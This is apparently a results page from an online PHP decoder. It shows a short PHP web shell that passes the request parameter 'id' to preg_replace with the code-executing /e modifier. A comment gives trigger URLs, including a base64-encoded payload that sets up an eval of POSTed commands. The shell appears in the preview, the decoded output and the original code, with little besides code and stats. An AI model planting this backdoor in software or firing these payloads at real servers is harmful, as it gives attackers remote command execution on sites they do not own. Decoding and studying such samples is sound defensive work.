Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $a = $_REQUEST['id']; preg_replace('/.*/e',' '.$a,''); ?> /* :?id=eval('ph..

Decoded Output download

<?php   
$a = $_REQUEST['id']; 
preg_replace('/.*/e',' '.$a,''); 
?> 
 
/*  
:?id=eval('phpinfo();'); 
:00.php?id=eval%28base64_decode%28%22QGV2YWwoJF9QT1NUWydjbWQnXSk7%22%29%29;  cmd 
*/ 

Did this file decode correctly?

Original Code

<?php  
$a = $_REQUEST['id'];
preg_replace('/.*/e',' '.$a,'');
?>

/* 
:?id=eval('phpinfo();');
:00.php?id=eval%28base64_decode%28%22QGV2YWwoJF9QT1NUWydjbWQnXSk7%22%29%29;  cmd
*/

Function Calls

preg_replace 1

Variables

$a None

Stats

MD5 9846ae7a5a56600e8c120fff8a6ad03c
Eval Count 1
Decode Time 80 ms